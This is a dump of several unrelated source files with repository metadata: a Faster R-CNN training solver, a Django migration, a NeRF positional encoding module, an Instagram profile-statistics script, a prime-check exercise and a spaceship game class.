    """Multiply the learning rate of every param group by *scale*."""
    for group in optimizer.param_groups:
        group['lr'] = group['lr'] * scale
class SolverWrapper(object):
    """
    A wrapper class for the training process.

    Owns the network, the train/val roidbs, the SGD optimizer and the
    tensorboard writers, and drives the snapshot/restore cycle so a run
    can resume exactly where it stopped (model weights in .pth files,
    numpy RNG state + data-layer cursors pickled in matching .pkl files).
    """

    def __init__(self, network, imdb, roidb, valroidb, output_dir, tbdir, pretrained_model=None):
        self.net = network
        self.imdb = imdb
        self.roidb = roidb
        self.valroidb = valroidb
        self.output_dir = output_dir
        self.tbdir = tbdir
        # Simply put '_val' at the end to save the summaries from the validation set
        self.tbvaldir = tbdir + '_val'
        if not os.path.exists(self.tbvaldir):
            os.makedirs(self.tbvaldir)
        self.pretrained_model = pretrained_model

    def snapshot(self, iter):
        """Write model weights (.pth) and resume metadata (.pkl) for *iter*.

        Returns (weights_path, metadata_path).
        """
        if not os.path.exists(self.output_dir):
            os.makedirs(self.output_dir)

        # Store the model snapshot
        filename = cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_{:d}'.format(iter) + '.pth'
        filename = os.path.join(self.output_dir, filename)
        torch.save(self.net.state_dict(), filename)
        print('Wrote snapshot to: {:s}'.format(filename))

        # Also store some meta information, random state, etc.
        nfilename = cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_{:d}'.format(iter) + '.pkl'
        nfilename = os.path.join(self.output_dir, nfilename)
        # current state of numpy random
        st0 = np.random.get_state()
        # current position in the database
        cur = self.data_layer._cur
        # current shuffled indexes of the database
        perm = self.data_layer._perm
        # current position in the validation database
        cur_val = self.data_layer_val._cur
        # current shuffled indexes of the validation database
        perm_val = self.data_layer_val._perm
        # Dump the meta info.  NOTE: the read order in from_snapshot()
        # must match this write order exactly.
        with open(nfilename, 'wb') as fid:
            pickle.dump(st0, fid, pickle.HIGHEST_PROTOCOL)
            pickle.dump(cur, fid, pickle.HIGHEST_PROTOCOL)
            pickle.dump(perm, fid, pickle.HIGHEST_PROTOCOL)
            pickle.dump(cur_val, fid, pickle.HIGHEST_PROTOCOL)
            pickle.dump(perm_val, fid, pickle.HIGHEST_PROTOCOL)
            pickle.dump(iter, fid, pickle.HIGHEST_PROTOCOL)

        return filename, nfilename

    def from_snapshot(self, sfile, nfile):
        """Restore weights from *sfile* and RNG/data-layer state from *nfile*.

        Returns the iteration the snapshot was taken at.
        """
        print('Restoring model snapshots from {:s}'.format(sfile))
        self.net.load_state_dict(torch.load(str(sfile)))
        print('Restored.')
        # Needs to restore the other hyper-parameters/states for training, (TODO xinlei) I have
        # tried my best to find the random states so that it can be recovered exactly
        # However the Tensorflow state is currently not available
        with open(nfile, 'rb') as fid:
            # Read order mirrors the dump order in snapshot().
            st0 = pickle.load(fid)
            cur = pickle.load(fid)
            perm = pickle.load(fid)
            cur_val = pickle.load(fid)
            perm_val = pickle.load(fid)
            last_snapshot_iter = pickle.load(fid)

            np.random.set_state(st0)
            self.data_layer._cur = cur
            self.data_layer._perm = perm
            self.data_layer_val._cur = cur_val
            self.data_layer_val._perm = perm_val

        return last_snapshot_iter

    def construct_graph(self):
        """Build the network, the SGD optimizer and the tensorboard writers.

        Returns (initial_lr, optimizer).
        """
        # Set the random seed
        torch.manual_seed(cfg.RNG_SEED)
        # Build the main computation graph
        self.net.create_architecture(self.imdb.num_classes, tag='default',
                                     anchor_scales=cfg.ANCHOR_SCALES,
                                     anchor_ratios=cfg.ANCHOR_RATIOS)
        # Define the loss
        # loss = layers['total_loss']
        # Set learning rate and momentum
        lr = cfg.TRAIN.LEARNING_RATE
        params = []
        # Per-parameter learning rates: 'refine' layers train at 10x the
        # base lr, and biases optionally get a doubled lr / no decay
        # (standard Caffe-style bias handling).
        for key, value in dict(self.net.named_parameters()).items():
            if value.requires_grad:
                if 'refine' in key and 'bias' in key:
                    params += [{'params':[value],'lr':10*lr*(cfg.TRAIN.DOUBLE_BIAS + 1), 'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
                elif 'refine' in key and 'bias' not in key:
                    params += [{'params':[value],'lr':10*lr, 'weight_decay': getattr(value, 'weight_decay', cfg.TRAIN.WEIGHT_DECAY)}]
                elif 'refine' not in key and 'bias' in key:
                    params += [{'params':[value],'lr':lr*(cfg.TRAIN.DOUBLE_BIAS + 1), 'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
                else:
                    params += [{'params':[value],'lr':lr, 'weight_decay': getattr(value, 'weight_decay', cfg.TRAIN.WEIGHT_DECAY)}]
        self.optimizer = torch.optim.SGD(params, momentum=cfg.TRAIN.MOMENTUM)
        # Write the train and validation information to tensorboard
        self.writer = tb.writer.FileWriter(self.tbdir)
        self.valwriter = tb.writer.FileWriter(self.tbvaldir)

        return lr, self.optimizer

    def find_previous(self):
        """Locate existing snapshots in output_dir, oldest first.

        Returns (count, metadata_files, weight_files).
        """
        sfiles = os.path.join(self.output_dir, cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_*.pth')
        sfiles = glob.glob(sfiles)
        sfiles.sort(key=os.path.getmtime)
        # Get the snapshot name in pytorch
        redfiles = []
        for stepsize in cfg.TRAIN.STEPSIZE:
            redfiles.append(os.path.join(self.output_dir,
                            cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_{:d}.pth'.format(stepsize+1)))
        #sfiles = [ss for ss in sfiles if ss not in redfiles]

        nfiles = os.path.join(self.output_dir, cfg.TRAIN.SNAPSHOT_PREFIX + '_iter_*.pkl')
        nfiles = glob.glob(nfiles)
        nfiles.sort(key=os.path.getmtime)
        redfiles = [redfile.replace('.pth', '.pkl') for redfile in redfiles]
        #nfiles = [nn for nn in nfiles if nn not in redfiles]

        lsf = len(sfiles)
        # Every weights file must have a matching metadata file.
        assert len(nfiles) == lsf
        return lsf, nfiles, sfiles

    def initialize(self):
        """Fresh start: load ImageNet-pretrained weights into the backbone.

        Returns (lr, last_snapshot_iter, stepsizes, np_paths, ss_paths).
        """
        # Initial file lists are empty
        np_paths = []
        ss_paths = []
        # Fresh train directly from ImageNet weights
        print('Loading initial model weights from {:s}'.format(self.pretrained_model))
        self.net.load_pretrained_cnn(torch.load(self.pretrained_model))
        print('Loaded.')
        # Need to fix the variables before loading, so that the RGB weights are changed to BGR
        # For VGG16 it also changes the convolutional weights fc6 and fc7 to
        # fully connected weights
        last_snapshot_iter = 0
        lr = cfg.TRAIN.LEARNING_RATE
        stepsizes = list(cfg.TRAIN.STEPSIZE)

        return lr, last_snapshot_iter, stepsizes, np_paths, ss_paths

    def restore(self, sfile, nfile):
        """Resume from a snapshot pair, re-applying any lr decays that
        already happened before the snapshot iteration.

        Returns (lr, last_snapshot_iter, remaining_stepsizes, np_paths, ss_paths).
        """
        # Get the most recent snapshot and restore
        np_paths = [nfile]
        ss_paths = [sfile]
        # Restore model from snapshots
        last_snapshot_iter = self.from_snapshot(sfile, nfile)
        # Set the learning rate
        lr_scale = 1
        stepsizes = []
        for stepsize in cfg.TRAIN.STEPSIZE:
            if last_snapshot_iter > stepsize:
                # This decay step is already in the past: fold it in now.
                lr_scale *= cfg.TRAIN.GAMMA
            else:
                stepsizes.append(stepsize)
        scale_lr(self.optimizer, lr_scale)
        lr = cfg.TRAIN.LEARNING_RATE * lr_scale
        return lr, last_snapshot_iter, stepsizes, np_paths, ss_paths

    def remove_snapshot(self, np_paths, ss_paths):
        """Delete the oldest snapshot files beyond cfg.TRAIN.SNAPSHOT_KEPT,
        mutating both path lists in place."""
        to_remove = len(np_paths) - cfg.TRAIN.SNAPSHOT_KEPT
        for c in range(to_remove):
            nfile = np_paths[0]
            os.remove(str(nfile))
            np_paths.remove(nfile)

        to_remove = len(ss_paths) - cfg.TRAIN.SNAPSHOT_KEPT
        for c in range(to_remove):
            sfile = ss_paths[0]
            # To make the code compatible to earlier versions of Tensorflow,
            # where the naming tradition for checkpoints are different
            os.remove(str(sfile))
            ss_paths.remove(sfile)

    def train_model(self, max_iters):
        """Run the training loop for *max_iters* iterations, snapshotting
        periodically and decaying the lr at cfg.TRAIN.STEPSIZE boundaries."""
        # Build data layers for both training and validation set
        self.data_layer = RoIDataLayer(self.roidb, self.imdb.num_classes)
        self.data_layer_val = RoIDataLayer(self.valroidb, self.imdb.num_classes, random=True)

        # Construct the computation graph
        lr, train_op = self.construct_graph()

        # Find previous snapshots if there is any to restore from
        lsf, nfiles, sfiles = self.find_previous()

        # Initialize the variables or restore them from the last snapshot
        if lsf == 0:
            lr, last_snapshot_iter, stepsizes, np_paths, ss_paths = self.initialize()
        else:
            lr, last_snapshot_iter, stepsizes, np_paths, ss_paths = self.restore(str(sfiles[-1]), str(nfiles[-1]))
        iter = last_snapshot_iter + 1
        last_summary_time = time.time()
        # Make sure the lists are not empty
        stepsizes.append(max_iters)
        # Reversed so pop() yields the next decay boundary in order.
        stepsizes.reverse()
        next_stepsize = stepsizes.pop()

        self.net.train()
        self.net.to(self.net._device)

        while iter < max_iters + 1:
            # Learning rate
            if iter == next_stepsize + 1:
                # Add snapshot here before reducing the learning rate
                self.snapshot(iter)
                lr *= cfg.TRAIN.GAMMA
                scale_lr(self.optimizer, cfg.TRAIN.GAMMA)
                next_stepsize = stepsizes.pop()

            #if ((iter -1) % cfg.TRAIN.MIL_RECURRENT_STEP) == 0:
            #    num_epoch = int((iter - 1) / cfg.TRAIN.MIL_RECURRENT_STEP) + 1
            #    cfg.TRAIN.MIL_RECURRECT_WEIGHT = ((num_epoch - 1)/20.0)/1.5
            #if iter == cfg.TRAIN.MIL_RECURRENT_STEP + 1:
            #    cfg.TRAIN.MIL_RECURRECT_WEIGHT = cfg.TRAIN.MIL_RECURRECT_WEIGHT * 10

            utils.timer.timer.tic()
            # Get training data, one batch at a time
            blobs = self.data_layer.forward(iter)

            now = time.time()
            if iter == 1 or now - last_summary_time > cfg.TRAIN.SUMMARY_INTERVAL:
                # Compute the graph with summary
                cls_det_loss, refine_loss_1, refine_loss_2, consistency_loss, total_loss, summary = \
                    self.net.train_step_with_summary(blobs, self.optimizer, iter)
                # cls_det_loss, refine_loss_1, refine_loss_2, total_loss, summary = \
                #     self.net.train_step_with_summary(blobs, self.optimizer, iter)
                #for _sum in summary: self.writer.add_summary(_sum, float(iter))
                # Also check the summary on the validation set
                #blobs_val = self.data_layer_val.forward()
                #summary_val = self.net.get_summary(blobs_val, iter, drop_block)
                #summary_val = self.net.get_summary(blobs_val, iter)
                #for _sum in summary_val: self.valwriter.add_summary(_sum, float(iter))
                last_summary_time = now
            else:
                # Compute the graph without summary
                #cls_det_loss, refine_loss_1, refine_loss_2, total_loss = self.net.train_step(blobs, self.optimizer, iter)
                cls_det_loss, refine_loss_1, refine_loss_2, consistency_loss, total_loss = self.net.train_step(blobs,self.optimizer,iter)
            utils.timer.timer.toc()

            # Display training information
            if iter % (cfg.TRAIN.DISPLAY) == 0:
                # print('iter: %d / %d, total loss: %.6f\n >>> cls_det_loss: %.6f\n '
                #       '>>> refine_loss_1: %.6f\n >>> refine_loss_2: %.6f\n >>> lr: %f' % \
                #       (iter, max_iters, total_loss, cls_det_loss, refine_loss_1, refine_loss_2, lr))
                print('iter: %d / %d, total loss: %.6f\n >>> cls_det_loss: %.6f\n '
                      '>>> refine_loss_1: %.6f\n >>> refine_loss_2: %.6f\n >>> consistency_loss: %.6f\n >>> lr: %f' % \
                      (iter, max_iters, total_loss, cls_det_loss, refine_loss_1, refine_loss_2, consistency_loss, lr))
                print('speed: {:.3f}s / iter'.format(utils.timer.timer.average_time()))

                # for k in utils.timer.timer._average_time.keys():
                #     print(k, utils.timer.timer.average_time(k))

            # Snapshotting
            if iter % cfg.TRAIN.SNAPSHOT_ITERS == 0:
                last_snapshot_iter = iter
                ss_path, np_path = self.snapshot(iter)
                np_paths.append(np_path)
                ss_paths.append(ss_path)

                # Remove the old snapshots if there are too many
                if len(np_paths) > cfg.TRAIN.SNAPSHOT_KEPT:
                    self.remove_snapshot(np_paths, ss_paths)

            iter += 1

        if last_snapshot_iter != iter - 1:
            self.snapshot(iter - 1)

        self.writer.close()
        self.valwriter.close()
def get_training_roidb(imdb):
    """Returns a roidb (Region of Interest database) for use in training."""
    if cfg.TRAIN.USE_FLIPPED:
        # Data augmentation: double the dataset with mirrored copies.
        print('Appending horizontally-flipped training examples...')
        imdb.append_flipped_images()
        print('done')

    print('Preparing training data...')
    # Adds derived per-entry fields (image path, size, overlap stats, ...).
    rdl_roidb.prepare_roidb(imdb)
    print('done')

    return imdb.roidb
def filter_roidb(roidb):
    """Remove roidb entries that have no usable RoIs."""

    def _has_usable_rois(entry):
        # An entry is usable when it has at least one foreground box
        # (overlap >= FG_THRESH) or one background box whose overlap
        # lies in [BG_THRESH_LO, BG_THRESH_HI).
        overlaps = entry['max_overlaps']
        fg = np.where(overlaps >= cfg.TRAIN.FG_THRESH)[0]
        bg = np.where((overlaps < cfg.TRAIN.BG_THRESH_HI) &
                      (overlaps >= cfg.TRAIN.BG_THRESH_LO))[0]
        return len(fg) > 0 or len(bg) > 0

    num = len(roidb)
    filtered_roidb = [entry for entry in roidb if _has_usable_rois(entry)]
    num_after = len(filtered_roidb)
    print('Filtered {} roidb entries: {} -> {}'.format(num - num_after,
                                                       num, num_after))
    return filtered_roidb
def train_net(network, imdb, roidb, valroidb, output_dir, tb_dir,
              pretrained_model=None,
              max_iters=40000):
    """Train a Faster R-CNN network."""
    # Drop entries with no usable RoIs before training.
    usable_roidb = filter_roidb(roidb)
    usable_valroidb = filter_roidb(valroidb)

    solver = SolverWrapper(network, imdb, usable_roidb, usable_valroidb,
                           output_dir, tb_dir,
                           pretrained_model=pretrained_model)
    print('Solving...')
    solver.train_model(max_iters)
    print('done solving')
|
[
"huangzy666666@gmail.com"
] |
huangzy666666@gmail.com
|
76289dc29e23594f8f88518fc2be3110d6f1fd27
|
6f2d0c4e5f89d163241b8aa32b8ab8cf030ac59f
|
/sma/migrations/0002_attendance_grade_mentor_school_session_schedule_student_student_group_mentor_assignment.py
|
43747906e0891bdef54fb5dfa8e56fa0d4f7e76c
|
[] |
no_license
|
johnpgarza/omk-oldest
|
cc4f1578b19ee7c40ac1757608b8c20b25f34842
|
2992bbc12a0f1e31243db9e8bded75d46ec208eb
|
refs/heads/master
| 2023-08-19T08:48:22.017632
| 2020-04-26T01:00:38
| 2020-04-26T01:00:38
| 258,906,307
| 0
| 0
| null | 2021-09-22T18:55:37
| 2020-04-26T00:52:29
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 6,475
|
py
|
# Generated by Django 3.0.4 on 2020-03-20 04:28
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated Django migration (do not hand-edit the operations):
    creates the Grade, Mentor, School, Student_Group_Mentor_Assignment,
    Student, Session_Schedule and Attendance tables for the sma app.
    """

    dependencies = [
        ('sma', '0001_initial'),
    ]

    operations = [
        # Grade level lookup table.
        migrations.CreateModel(
            name='Grade',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('grade_num', models.CharField(max_length=100)),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated_date', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # Mentor contact record.
        migrations.CreateModel(
            name='Mentor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mentor_first_name', models.CharField(max_length=100)),
                ('mentor_middle_name', models.CharField(blank=True, max_length=100)),
                ('mentor_last_name', models.CharField(max_length=100)),
                ('mentor_email', models.EmailField(max_length=100)),
                ('mentor_address', models.CharField(max_length=200)),
                ('mentor_city', models.CharField(max_length=50)),
                ('mentor_state', models.CharField(max_length=50)),
                ('mentor_zip', models.CharField(max_length=10)),
                ('mentor_phone', models.CharField(max_length=50)),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated_date', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # School contact record.
        migrations.CreateModel(
            name='School',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('school_name', models.CharField(max_length=100)),
                ('school_address', models.CharField(max_length=200)),
                ('school_city', models.CharField(max_length=50)),
                ('school_state', models.CharField(max_length=50)),
                ('school_zip', models.CharField(max_length=10)),
                ('school_email', models.EmailField(max_length=100)),
                ('school_phone', models.CharField(max_length=50)),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated_date', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        # A named student group tied to a grade, mentor and school.
        migrations.CreateModel(
            name='Student_Group_Mentor_Assignment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('group_name', models.CharField(max_length=100)),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated_date', models.DateTimeField(auto_now_add=True)),
                ('grade', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.Grade')),
                ('mentor', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.Mentor')),
                ('school', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.School')),
            ],
        ),
        # Student record, linked to a grade and a school.
        migrations.CreateModel(
            name='Student',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('student_first_name', models.CharField(max_length=100)),
                ('student_middle_name', models.CharField(blank=True, max_length=100)),
                ('student_last_name', models.CharField(max_length=100)),
                ('student_gender', models.CharField(max_length=100)),
                ('student_dateofbirth', models.DateTimeField(max_length=50)),
                ('student_email', models.EmailField(max_length=100)),
                ('student_address', models.CharField(max_length=200)),
                ('student_city', models.CharField(max_length=50)),
                ('student_state', models.CharField(max_length=50)),
                ('student_zip', models.CharField(max_length=10)),
                ('student_phone', models.CharField(max_length=50)),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated_date', models.DateTimeField(auto_now_add=True)),
                ('grade', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.Grade')),
                ('school', models.ForeignKey(blank=True, default='', null=True, on_delete=django.db.models.deletion.CASCADE, to='sma.School')),
            ],
        ),
        # One scheduled mentoring session for a group.
        migrations.CreateModel(
            name='Session_Schedule',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('session_location', models.CharField(max_length=50)),
                ('session_start_date', models.DateTimeField(max_length=20)),
                ('session_end_date', models.DateTimeField(max_length=20)),
                ('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Student_Group_Mentor_Assignment')),
                ('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Mentor')),
            ],
        ),
        # Per-student attendance mark for a session.
        migrations.CreateModel(
            name='Attendance',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('attendance', models.CharField(max_length=100)),
                ('attendance_grade_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Grade')),
                ('attendance_mentor_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Mentor')),
                ('attendance_session_ID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Session_Schedule')),
                ('attendance_student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sma.Student')),
            ],
        ),
    ]
|
[
"jgarza@unomaha.edu"
] |
jgarza@unomaha.edu
|
f5584a8dbc7c3d9effdab81e3e631e40c0e4f0f0
|
586aba25a13b90a21c90949fad303f8499cee42f
|
/model/positional_encoding.py
|
28f7b714267d2324960ead55848c7b940ff984c6
|
[] |
no_license
|
leejaeyong7/tc-nerf
|
c95301370eb41158f110bb0bc00760f52273708a
|
49bd2cf7afd6f69278a1fc9a7b2bada2351f86ca
|
refs/heads/main
| 2023-03-28T04:11:59.694524
| 2021-04-01T03:48:41
| 2021-04-01T03:48:41
| 309,032,701
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
import torch
from torch import nn
class PositionalEncoding(nn.Module):
    """NeRF-style positional encoding.

    Embeds x to (x, sin(f_0 x), cos(f_0 x), ..., sin(f_{N-1} x),
    cos(f_{N-1} x)) along the last dimension, where the frequencies are
    powers of two (logscale) or linearly spaced.
    """

    def __init__(self, N_freqs, logscale=True):
        """
        Defines a function that embeds x to (x, sin(2^k x), cos(2^k x), ...)
        in_channels: number of input channels (3 for both xyz and direction)
        """
        super(PositionalEncoding, self).__init__()
        self.N_freqs = N_freqs
        self.funcs = [torch.sin, torch.cos]

        if logscale:
            self.freq_bands = 2 ** torch.linspace(0, N_freqs - 1, N_freqs)
        else:
            self.freq_bands = torch.linspace(1, 2 ** (N_freqs - 1), N_freqs)

    def forward(self, x):
        # Order matters: identity first, then sin/cos pairs per frequency.
        encoded = [x]
        encoded.extend(fn(band * x)
                       for band in self.freq_bands
                       for fn in self.funcs)
        return torch.cat(encoded, -1)
|
[
"leejaeyong7@gmail.com"
] |
leejaeyong7@gmail.com
|
e68d468cc348fa28a58ca4b6567a053ae7440b3c
|
bdf574f292aa1617d6591cc58ba19ceb27a517be
|
/Instagram menteri.py
|
de9ff2c21417f9d354f7c634a7bccfbbfcfc1435
|
[] |
no_license
|
digilab-cfds/Profiling_Menteri_2019
|
ddcd9a2d21524dfd2c91cc2b2db1b8c1d0e6b20b
|
9190242a98eae27cc78a64de4cda9b81328cc4d2
|
refs/heads/master
| 2020-09-08T12:08:29.816908
| 2019-11-12T04:23:03
| 2019-11-12T04:23:03
| 221,129,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,422
|
py
|
#%%
# Log in to Instagram via the private-API wrapper.
# NOTE(review): replace the placeholder credentials before running —
# they are checked in verbatim here.
from InstagramAPI import InstagramAPI
api = InstagramAPI("username", "password")
if (api.login()):
    #api.getSelfUserFeed()
    print("Login succes!")
else:
    print("Can't login!")

#%%
# Instagram usernames of the ministers to profile, and their numeric
# user ids (parallel lists: listId[i] is the id for listNama[i]).
listNama = ['mohmahfudmd', 'airlanggahartarto','muhadjir_effendy'
            ,'luhut_binsar_pandjaitan','prabowo','retno_marsudi'
            ,'smindrawati','agusgumiwangk','syahrulyasinlimpo'
            ,'siti.nurbayabakar','edhy.prabowo','sofyan.djalil','erickthohir'
            ,'wishnutama','bambangbrodjonegoro']
listId = [9503537257,3010352830,3898729931,2883229423,2142213578,6157128675,
          4142926332,7139255865,2090763378 ,6329551081,5469831536,
          3668403949,259804442,6668780,5844048390]
#%%
import pandas as pd
def getInfo(username, user_id):
    """Collect profile statistics for one Instagram account.

    Pages through the user's entire feed via the module-level ``api``
    (a logged-in InstagramAPI instance) and returns
    ``[followers, post, comment, like]``.

    NOTE(review): field names like 'follower_count' / 'num_results' /
    'more_available' mirror the private Instagram API response schema
    and may break when that schema changes.
    """
    api.getUsernameInfo(user_id)
    data = api.LastJson
    followers = data['user']['follower_count']
    post = data['user']['media_count']
    print('Username : ', username)
    print('Followers : ', followers)
    print('Posts : ', post)

    # Paginate through the feed: max_id is the cursor returned by the
    # previous page, empty string for the first request.
    more_available = True
    max_id = ''
    result = 0
    comment = 0
    like = 0
    while more_available:
        api.getUserFeed(user_id, max_id)
        media = api.LastJson
        post2 = media['num_results']
        for i in range(int(post2)):
            # Some posts have comments disabled and then lack the
            # comment_count field entirely.
            check = 'comment_likes_enabled' in media['items'][i]
            #print(check)
            if check==True:
                c = media['items'][i]['comment_count']
                comment += c
            else:
                c = 0
                comment += c
            l = media['items'][i]['like_count']
            like += l
            #print(media['items'][i]['comment_count'])
            #print(media['items'][i]['like_count'])
        result += api.LastJson['num_results']
        #print('result : ',result)
        more_available = api.LastJson['more_available']
        if more_available == False:
            print ('total post :', result)
        else:
            max_id = api.LastJson['next_max_id']
            #print(max_id)
    print('Total Comments : ', comment)
    print('Total Likes : ', like)
    d = [followers, post, comment, like]
    return d
#%%
# Collect the profile statistics for every minister and build a table.
output = []  # FIX: `output` was appended to below without ever being initialised
for nama, uid in zip(listNama, listId):
    output.append(getInfo(nama, uid))

df = pd.DataFrame(output)
df.columns = ['Total Followers', 'Total Post', 'Total Comments', 'Total Likes']
|
[
"noreply@github.com"
] |
digilab-cfds.noreply@github.com
|
66d24fc1b4e5f725e474f09fb23c79522bd46f9a
|
eb8d4c754ca229b83af47b3b9fe4488ffff6d4a6
|
/estrutura-de-repeticao/exercicio21.py
|
809b25edcd4e3b42617012296539bd9cf10a878c
|
[
"MIT"
] |
permissive
|
diegolinkk/exercicios-python-brasil
|
1e5e712e057e9819b8c14b1aa1c40fb94d6e31a1
|
3bf7bdf0e98cdd06c115eedae4fa01e0c25fdba5
|
refs/heads/main
| 2023-07-15T09:54:36.309310
| 2021-08-15T00:12:18
| 2021-08-15T00:12:18
| 358,438,830
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
#Faça um programa que peça um número inteiro e determine se ele é ou não um número primo.
# Um número primo é aquele que é divisível somente por ele mesmo e por 1.

numero = int(input("Digite um número: "))

# Count how many integers in [1, numero] divide it evenly; a prime has
# exactly two such divisors (1 and itself).  The original test accepted
# any count <= 2, which wrongly classified 1 (one divisor) and every
# number < 1 (zero divisors: the loop never runs) as prime.
contador_divisoes_inteiras = 0
for divisor in range(1, numero + 1):
    if numero % divisor == 0:
        contador_divisoes_inteiras += 1

if contador_divisoes_inteiras == 2:
    print("O número é primo")
else:
    print("O número não é primo")
|
[
"diegolinkk@gmail.com"
] |
diegolinkk@gmail.com
|
8912a74e600a883095b5af30146b2029ad3057ed
|
6b20e6a11842cf2f2624ec4f0387fab5305b4a09
|
/Nave.py
|
c4842d0e1577ffd99422f8ee1426c1bdb34a7bc9
|
[
"Apache-2.0"
] |
permissive
|
Albertojserr/Mi-Primer-Ejercicio-POO
|
3c14adbc19dcb4f6d039d301d2a12ce966141b96
|
3de8df95be8cd9894ea68c225822b1f9d4be6423
|
refs/heads/main
| 2023-08-27T19:27:22.451102
| 2021-10-29T14:52:50
| 2021-10-29T14:52:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,131
|
py
|
from Guerrero import Guerrero
from Marciano import Marciano
from Terricola import Terricola
class Nave():
    """A spaceship carrying a crew of identical warriors.

    The whole crew is either Marciano or Terricola (any other type is
    rejected at construction).  Members are created internally and
    addressed by their 0-based index in the crew list.
    """

    def __init__(self, warrior_type, name="Millenium Falcon", crew=1):
        """Build a ship with *crew* warriors of class *warrior_type*.

        Raises TypeError for a non-int crew or an unknown warrior type,
        ValueError for a negative crew size.
        """
        if(not isinstance(crew,int)):
            raise TypeError("crew is the number of warriors and should be an int")
        elif(crew < 0):
            raise ValueError("crew is the number of warriors and should be an int > 0")
        elif(warrior_type == Marciano or warrior_type == Terricola):
            # Both branches of the original were identical apart from the
            # generated member names, so they are merged here.
            self.__type = warrior_type
            self.__name = name
            self.__crew = list()
            prefix = "marciano" if warrior_type == Marciano else "terricola"
            for i in range(0, crew):
                self.__crew.append(warrior_type(prefix + str(i)))
        else:
            raise TypeError("TYPE of GUERREROS WRONG")
        print("Created a ship " + self.__name + " of " + str(self.__type) + " with " + str(crew) + " members")

    def __str__(self):
        return self.__name + " OF " + str(len(self.__crew)) + " " + str(self.__type)

    def get_shot(self, shot):
        """Deliver *shot* to every crew member.

        shot == -1 means a shot from a dead member and is passed through
        unvalidated; any other value must lie in [0, Guerrero.get_maxTarget()].
        """
        if(not isinstance(shot,int)):
            raise TypeError("shot should be an int")
        elif(shot == -1):
            # A shot from a dead member
            pass
        elif(shot < 0 or shot > Guerrero.get_maxTarget()):
            raise ValueError("shot OUT OF RANGE")
        for i in range(0, len(self.__crew)):
            if(self.__type == Marciano or self.__type == Terricola):
                self.__crew[i].get_shot(shot)
            else:
                # FIX: str() added — the original concatenated a str with a
                # list, which would raise TypeError instead of this message.
                raise TypeError("TYPE of GUERREROS WRONG in the crew " + str(self.__crew))

    def shoot(self, warrior):
        """Make crew member *warrior* shoot; raises ValueError for a bad index."""
        if(warrior >= 0 and warrior < len(self.__crew)):
            return self.__crew[warrior].shoot()
        else:
            raise ValueError("The warrior: " + str(warrior) + " does not exist in the ship: " + self.__name)

    def membersAlive(self):
        """Return how many crew members are still alive."""
        membersAlive = 0
        # I AM LAUNCHING AN IMPOSSIBLE EXCEPTION, SINCE IT CANT BE ANY NAVE WITH OTHER TYPE THAN MARCIANO OR TERRICOLA
        # Read Constructor to double check it. That is why the exception is not documented
        if(self.__type == Marciano or self.__type == Terricola):
            for warrior in self.__crew:
                # We access the member of the grandparent class (SerVivo), that is shared by all warriors (Marciano and Terricola)!
                if(warrior.is_vivo()):
                    membersAlive += 1
        else:
            raise TypeError("TYPE of GUERREROS WRONG ")
        return membersAlive

    def isWarriorAlive(self, warrior):
        """Return whether crew member *warrior* is alive; raises ValueError for a bad index."""
        if(warrior >= 0 and warrior < len(self.__crew)):
            return self.__crew[warrior].is_vivo()
        else:
            raise ValueError("The warrior: " + str(warrior) + " does not exist in the ship: " + self.__name)

    def number_of_members(self):
        """Return the total crew size (alive or dead)."""
        return len(self.__crew)
|
[
"alberto.j.serrano@gmail.com"
] |
alberto.j.serrano@gmail.com
|
c6698562cc25684f53c90e7da85446bb439283a9
|
2ea49bfaa6bc1b9301b025c5b2ca6fde7e5bb9df
|
/contributions/mattia.penati/python/Data Structures/2016-09-13.py
|
78ee8b992e510f221264d582a1fae6cf11e8a12f
|
[] |
no_license
|
0x8801/commit
|
